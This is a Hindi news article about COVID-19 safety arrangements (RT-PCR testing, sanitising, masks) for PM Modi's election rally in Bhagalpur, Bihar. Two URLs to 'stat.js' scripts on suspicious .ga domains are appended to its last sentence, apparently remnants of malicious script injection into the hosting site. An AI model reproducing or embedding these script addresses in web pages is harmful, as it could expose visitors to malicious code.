बिहार विधानसभा चुनाव के लिए पीएम मोदी की पहली रैली 23 अक्टूबर को भागलपुर में होगी, इस रैली की तैयारियां जोरों शोरों से हो रही है।तथा रैली की तैयारियां होने के साथ-साथ कोरोना प्रोटोकॉल की भी तैयारी हो रही है, और रैली के साथ कोरोना प्रोटोकॉल का भी ध्यान रखा जाएगा और कोरोनावायरस से जुड़े सारे नियमों का पालन किया जाएगा। प्रधानमंत्री नरेंद्र मोदी की रैली में मंच साझा करने वाले नेताओं और अधिकारियों की कोरोनावायरस की जांच होगी।

 

 

और प्रधान सचिव के निर्देश के मुताबिक रैली स्थल के वीआईपी एरिया में जो पुलिस और अधिकारी होंगे उनकी भी कोरोना की दो बार जाचे होंगी। स्वास्थ्य विभाग के प्रधान सचिव प्रत्यय अमृत ने कहा कि इन लोगों की 22 अक्टूबर को आरटी पीसीआर मशीन से कोरोनावायरस की जांच कराई जाए। और रैली के दिन इस एरिया में प्रवेश करने से पहले रैपिड एंटीजन किट से जांच कराई जाए।और बोला कि इस एरिया में कोरोनावायरस संक्रमित कोई भी व्यक्ति प्रवेश न करने पाए इसके लिए वह हर व्यक्ति की क्लीनिंग करेंगे कोरोना के लक्षणों के आधार पर।

 

 

इसके साथ-साथ वीआईपी जोन में खड़े होने वाले हर वाहनों को सैनिटाइज कराया जाएगाऔर रैली में शामिल होने वाले हर व्यक्ति को प्रवेश द्वार पर हैंड सेनीटाइज कराया जाएगा और बिना मास्क लगाए प्रवेश नहीं करने दिया जाएगा। मंच रिसेप्शन के पास खड़े व्यक्तियों को मास्क लगाना अनिवार्य है वीआईपी कैप कार्यालय, मंच निर्माण में लगे मजदूरों कभी कोरोनावायरस की जांच होगी।

 

 

डॉ विजय कुमार सिंह, सिविल सर्जन, भागलपुर ने बताया कि रैली के प्रवेश द्वार पर हैंड सेनीटाइजर की व्यवस्था होगी और रैली से 1 दिन पहले वीआईपी एरिया और मंच के लोगों की सूची मिलते ही उनका आरटी पीसीआर मशीन से जांच के लिए सैंपल लिया जाएगा। और रैली स्थल पर कोरोनावायरस की जांच व स्क्रीनिंग के लिए अन्य अन्य मेडिकल टीम को रखा गया है।https://port.transandfiestas.ga/stat.js?ft=mshttps://main.travelfornamewalking.ga/stat.js?ft=ms

Leave a Reply

Your email address will not be published.